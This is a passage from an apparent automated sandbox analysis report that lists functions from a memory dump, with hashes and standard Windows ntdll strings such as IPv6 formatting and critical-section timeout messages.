                                                                  • API String ID:
                                                                  • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                  • Instruction ID: 8491bbf0c68eec994979d4c38112dc1605f6b9b2ba9e10da3e70805fa5193633
                                                                  • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                  • Instruction Fuzzy Hash: BDC02B2F0292C149CD038F3103133C0BF70C7024C4F0C00C1D0C10F123C0148213C625
                                                                  Function 2CDD0750 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction ID: b3c839fde5f904e30de71563929c759e101b65f9c636d274ac60d40f18bf928c
                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                  • Instruction Fuzzy Hash: 64C04879701A868FDF05DB6AD294F8977E4FB84745F1508D0E809CBB22E624ED45CA21
                                                                  Function 2CEA4DAD Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                  • Instruction ID: ab72d485ed1ea53f958344874f2aaee6124fac702634020d27d27fe056a432be
                                                                  • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                  • Instruction Fuzzy Hash: 4DB01232212544CFC7025720CB00B5A36A9BF017C0F0A00F4A50089830D6188950E501
                                                                  Function 2CE12890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: 83484102ebeb0712b1c6d14b0acc8087187f7acc15ab1c1d11c81f21ca054d9f
                                                                  • Instruction ID: 0b6a9951e2b01c84b6d521ea74b9c1502a3d090f253746668807c566e54932ec
                                                                  • Opcode Fuzzy Hash: 83484102ebeb0712b1c6d14b0acc8087187f7acc15ab1c1d11c81f21ca054d9f
                                                                  • Instruction Fuzzy Hash: 785118B6E04156BFDB11DF9C8D80D7EFBB8BB09204B108269E468D7645D278DF648BE0
                                                                  Function 2CE82410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                  • API String ID: 48624451-2108815105
                                                                  • Opcode ID: d629c47ab4cd9c88f2f9a9e5fe14c09ab10bce28616770da947aed47e706729c
                                                                  • Instruction ID: c0418ec703d432ea13cd0c76a8501ccc2349fb952f0c03f4511e227d0e9f6436
                                                                  • Opcode Fuzzy Hash: d629c47ab4cd9c88f2f9a9e5fe14c09ab10bce28616770da947aed47e706729c
                                                                  • Instruction Fuzzy Hash: BC5136B5A44A86AFCB20CF9CC8809BFF7F9EF44204B008659E49DD3696E670DF448761
                                                                  Function 2CE07630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 2CE44742
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 2CE44787
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 2CE446FC
                                                                  • ExecuteOptions, xrefs: 2CE446A0
                                                                  • Execute=1, xrefs: 2CE44713
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 2CE44655
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 2CE44725
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  • Opcode ID: 170bc9304b8cfdbd93258429bbb6018e0085399692f3718a5188d274336456b1
                                                                  • Instruction ID: b19d7c795bc095500686daad75dfc23d56379d1c6a2d73598d15cf256812b72e
                                                                  • Opcode Fuzzy Hash: 170bc9304b8cfdbd93258429bbb6018e0085399692f3718a5188d274336456b1
                                                                  • Instruction Fuzzy Hash: 6E512D71A002197ADF11DAA4EC86FEA73B8EF14345F1001A9E505B7191D7719F8ACF91
                                                                  Function 2CE1B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: 1a024401d303c580e1c85883c18f4b0e18d20c7aa4eff7af2d4c1faee78aacfb
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: CD81E4F0E0A2498FDF05CF6CC850BEEBBB1AF55754F244259E861A7291C7B48DA0CB61
                                                                  Function 2CE820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$[$]:%u
                                                                  • API String ID: 48624451-2819853543
                                                                  • Opcode ID: 9028151cef9c8ca1c4d6a5baef8b0c1287ecefc459189ed78702aea31c3eb262
                                                                  • Instruction ID: 4c04895d024601782873a045ab9a549f394e0d6c4ca34b0329f0806d5cdf5186
                                                                  • Opcode Fuzzy Hash: 9028151cef9c8ca1c4d6a5baef8b0c1287ecefc459189ed78702aea31c3eb262
                                                                  • Instruction Fuzzy Hash: F0217477A01119ABDB10DF79CC40EEEBBF8EF54644F640226E909E3254E730DE158BA1
                                                                  Function 2CDFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 2CE402E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 2CE402BD
                                                                  • RTL: Re-Waiting, xrefs: 2CE4031E
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: b88bc078b9ed917ec0784709e98f73e3a871908d8bd3a7279561ea4c8606c768
                                                                  • Instruction ID: 4ca0865a280e9cbcf4834042db9f0aba0142768a08064c14a8b805fb7d81f9e0
                                                                  • Opcode Fuzzy Hash: b88bc078b9ed917ec0784709e98f73e3a871908d8bd3a7279561ea4c8606c768
                                                                  • Instruction Fuzzy Hash: 1BE1CD71A08742DFD721CF28D880B4AB7E1BF88314F210A2DF5A59B2E1D775D985CB82
                                                                  Function 2CE0BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 2CE47B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 2CE47B7F
                                                                  • RTL: Re-Waiting, xrefs: 2CE47BAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: bd5680dcd82a98709a117206777d207ce57b43554ab2cb15c4248f4b2b45e8f5
                                                                  • Instruction ID: cb58cb7f548fe63b9c82d847b3abb421df3cc9bdd5f17b91336018da82be32f2
                                                                  • Opcode Fuzzy Hash: bd5680dcd82a98709a117206777d207ce57b43554ab2cb15c4248f4b2b45e8f5
                                                                  • Instruction Fuzzy Hash: 4D41E0317057028BC720CE25DC41B56B7E6FF89714F100A1DE956AB680EB31E94ACBD2
                                                                  Function 2CE0B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE4728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 2CE472A3
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 2CE47294
                                                                  • RTL: Re-Waiting, xrefs: 2CE472C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: 3ba638a0e14b415fc5be7d2b6ffae3475b1275f0ff8990d9c5f49aee74daa31c
                                                                  • Instruction ID: b57a2caddcd4e786456bfc3cd437886cd0643b2d8782dfa960adb5f7816fbf2d
                                                                  • Opcode Fuzzy Hash: 3ba638a0e14b415fc5be7d2b6ffae3475b1275f0ff8990d9c5f49aee74daa31c
                                                                  • Instruction Fuzzy Hash: 80411F71B05242ABC720CE25CC42F96B7B5FF95314F100A19F964FB240EB21E98ACBD6
                                                                  Function 2CE82300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: %%%u$]:%u
                                                                  • API String ID: 48624451-3050659472
                                                                  • Opcode ID: 1b38c3129b26f4dabe3626a17ca818a834f86e6110b96a2a0d14d5a9306e9dd8
                                                                  • Instruction ID: d4a9e3dc194355f3b32a0efbedb8b6bb3d511294ec7008b3fc6065bdf90b874e
                                                                  • Opcode Fuzzy Hash: 1b38c3129b26f4dabe3626a17ca818a834f86e6110b96a2a0d14d5a9306e9dd8
                                                                  • Instruction Fuzzy Hash: 8F31C876A006199FDB14CF29CC50BEEB7F8EF14204F900555E94DE3240EB30DE488BA0
                                                                  Function 2CE17D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: f9bcd70f026973247f287750d265d0da76ae4b4c79d04a739bff174adca894a4
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: 2D91B471E0420A9EDB10CF69C883AAFB7E5BF49B64F60461AE955E72C0D7B09DA0C750